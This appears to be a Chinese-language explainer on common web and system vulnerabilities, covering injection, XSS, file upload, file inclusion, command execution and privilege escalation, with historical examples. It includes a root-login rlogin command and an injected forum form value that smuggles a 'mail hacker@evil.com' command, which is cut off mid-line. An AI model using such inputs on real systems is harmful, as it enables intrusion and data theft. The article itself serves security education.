常見的網絡安全漏洞有哪些


常見的網絡安全漏洞有哪些

文章插圖
第一:注入漏洞
由于其普遍性和嚴重性,注入漏洞位居漏洞排名第一位 。常見的注入漏洞包括SQL、LDAP、OS命令、ORM和OGML 。用戶可以通過任何輸入點輸入構建的惡意代碼,如果應用程序沒有嚴格過濾用戶的輸入,一旦輸入的惡意代碼作為命令或者查詢的一部分被發送到解析器,就可能導致注入漏洞 。
第二:跨站腳本漏洞
XSS漏洞的全稱是跨站點腳本漏洞 。XSS漏洞是網絡應用程序中常見的安全漏洞,它允許用戶將惡意代碼植入網頁,當其他用戶訪問此頁面時,植入的惡意腳本將在其他用戶的客戶端執行 。危害有很多,客戶端用戶的信息可以通過XSS漏洞獲取,比如用戶登錄的Cookie信息信息可以通過XSS蝸牛傳播木馬可以植入客戶端可以結合其他漏洞攻擊服務器,并在服務器中植入特洛伊木馬 。
第三、文件上傳漏洞
造成文件上傳漏洞的主要原因是應用程序中有上傳功能,但上傳的文件沒有通過嚴格的合法性檢查或者檢查功能有缺陷,導致木馬文件上傳到服務器 。文件上傳漏洞危害極大,因為惡意代碼可以直接上傳到服務器,可能造成服務器網頁修改、網站暫停、服務器遠程控制、后門安裝等嚴重后果 。
第四、文件包含漏洞
文件包含漏洞中包含的文件參數沒有過濾或嚴格定義,參數可以由用戶控制,可能包含意外文件 。如果文件中存在惡意代碼,無論文件是什么后綴類型,文件中的惡意代碼都會被解析執行,導致文件包含漏洞 。
第五、命令執行漏洞
應用程序的某些函數需要調用可以執行系統命令的函數 。如果這些功能或者功能的參數可以被用戶控制,那么惡意的命令就有可能通過命令連接器拼接成正常的功能,從而可以隨意執行系統命令 。這就是命令執行漏洞,屬于高風險漏洞之一 。
A.按漏洞可能對系統造成的直接威脅
可以大致分成以下幾類,事實上一個系統漏洞對安全造成的威脅遠不限于它的直接可能性,如果攻擊者獲得了對系統的一般用戶訪問權限,他就極有可能再通過利用本地漏洞把自己升級為管理員權限:
一.遠程管理員權限
攻擊者無須一個賬號登錄到本地直接獲得遠程系統的管理員權限,通常通過攻擊以root身份執行的有缺陷的系統守護進程來完成 。漏洞的絕大部分來源于緩沖區溢出,少部分來自守護進程本身的邏輯缺陷 。
典型漏洞:
1、IMAP4rev1 v10.190版的守護進程imapd的AUTHENTICATE命令存在讀入參數時未做長度檢查,構造一個精心設計的AUTH命令串,可以溢出imapd的緩沖區,執行指定的命令,由于imapd以root身份運行,從而直接獲得機器的root權限 。
2、WindowsNT IIS 4.0的ISAPI DLL對輸入的URL未做適當的邊界檢查,如果構造一個超長的URL,可以溢出IIS (inetinfo.exe)的緩沖區,執行我們指定的代碼 。由于inetinfo.exe是以local system身份啟動,溢出后可以直接得到管理員權限 。
【常見的網絡安全漏洞有哪些】3、早期AIX 3.2 rlogind代碼存在認證邏輯缺陷,用rlogin victim.com ?Cl ?Cfroot,可以直接以root身份登錄到系統而無須提供口令 。
二.本地管理員權限
攻擊者在已有一個本地賬號能夠登錄到系統的情況下,通過攻擊本地某些有缺陷的suid程序,競爭條件等手段,得到系統的管理員權限 。
典型漏洞:
1、RedHat Linux的restore是個suid程序,它的執行依靠一個中RSH的環境變量,通過設置環境變量PATH,可以使RSH變量中的可執行程序以root身份運行,從而獲得系統的root權限 。
2、Solaris 7的Xsun程序有suid位,它對輸入參數未做有效的邊界檢查,可以很容易地溢出它的緩沖區,以root身份運行我們指定的代碼,從而獲得管理員權限 。
3、在windows2000下,攻擊者就有機會讓網絡DDE(一種在不同的Windows機器上的應用程序之間動態共享數據的技術)代理在本地系統用戶的安全上下文中執行其指定的代碼,從而提升權限并完全控制本地機器 。
三.普通用戶訪問權限
攻擊者利用服務器的漏洞,取得系統的普通用戶存取權限,對UNIX類系統通常是shell訪問權限,對Windows系統通常是cmd.exe的訪問權限,能夠以一般用戶的身份執行程序,存取文件 。攻擊者通常攻擊以非root身份運行的守護進程,有缺陷的cgi程序等手段獲得這種訪問權限 。
典型漏洞:
1、UBB是個廣泛運行于各種UNIX和Windows系統的論壇程序,用PERL實現,它的5.19以下版本存在輸入驗證問題,通過提交精心構造的表單內容,可以使UBB去執行shell命令,因為一般的web服務器以nobody身份運行,因此可以得到一個nobody shell 。比如提交這樣的數據:topic='012345.ubb mail hacker@evil.com

推薦閱讀